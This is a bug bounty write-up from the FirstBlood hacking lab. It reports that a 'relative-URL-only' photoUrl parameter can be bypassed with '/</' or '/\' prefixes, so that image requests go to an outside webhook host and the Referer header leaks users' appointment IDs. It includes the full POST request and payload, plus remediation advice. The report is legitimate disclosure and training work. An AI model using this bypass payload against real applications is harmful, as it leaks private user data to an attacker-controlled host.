FirstBlood-#1395Appointment leakage
This issue was discovered on FirstBlood v3



On 2022-12-09, pichik Level 4 reported:

Hello zseano,

This one hit me right in my heart, i love hunting for bugs like this in the wild.

DESCRIPTION

So, as an admin you can edit doctor info here:
https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=1
If you visit this endpoint, there is warning Photos can not be changed, which of course means that it can be edited somehow.
By intercepting request after submitting our changes to doctor, we can try new parameter photo, this one will not work, but response will reveal us new parameter photoUrl:

Now if we add any external url there it will error out with : photoUrl must be a relative URL!
This can be bypassed with two ways : /\google.com or /</google.com as < is filterred.
I was looking to insert XSS there through svg and other ways, but wasnt able to do that, as new browser wont execcute any scripts in <img src=''> attribute.

It took me so long, but finally i got an idea, to leak appointment id through referer header.
Here is an small issue, that chrome nor firefox nor edge will allow cross domain full referer header.
It looked like this: referer https://019046743f9e-pichik.a.firstbloodhackers.com/ - only domain name was sent.
I had some issues with explorer, so i skipped testing that and was thinking to chain it with some XSS,
but then I realized two things:

  1. We don't consider viewing another users appointment as the ID is GUID4 and it's up to the users not to leak this, however if it can be leaked on our site without the use of XSS then that is something we consider an issue as we have various new API calls
    It looks like it would be out of scope, which i am not sure if it is chained like this.
  2. In previous event was some tricky XSS, which fired only in explorer
    I fixed my internet explorer and visited my appointment and of course the entire url in referer header was sent !!!
    And in the explorer you need to use /</google.com this version as /\ doesnt work there.

POC SCREEN:

Here is the request:

POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: 019046743f9e-pichik.a.firstbloodhackers.com
Cookie: drps=2050d3c4f04943f7439d7e65c
Content-Type: application/x-www-form-urlencoded

drid=1&name=test&bio=test&bookable=0&photoUrl=/>/webhook.site/[your-id]

IMPACT:

This will trigger every time user visit his appointment and his doctor with photo will show up.
Attacker can combine this attack with CSRF in my previous report, to leak appointment IDs of users registered to corresponding doctor.
If internet explorer is not enough, it can be also combined with XSS, as with the same domain, the url in referer header will be preserved whole.

REMEDIATION:

Remove photoUrl parameter from server side, if it should not be used.
Add better prevention against absolute urls, as this one be easily bypassed.
Do not allow / or \ at the beginning of the url.

(This one made me really happy ! So, thanks again for a great work !)

P3 Medium

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: photoUrl

Payload: /</webhook.site/[your-id]


FirstBlood ID: 60
Vulnerability Type: Application/Business Logic

The parameter "photoUrl" on /drapi/edit-dr.php should only allow for relative URL paths but this can be bypassed.

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were first to discover that you can use NON relative url paths in the photoUrl parameter! I am also awarding a further bounty at my own discretion for building a great proof of concept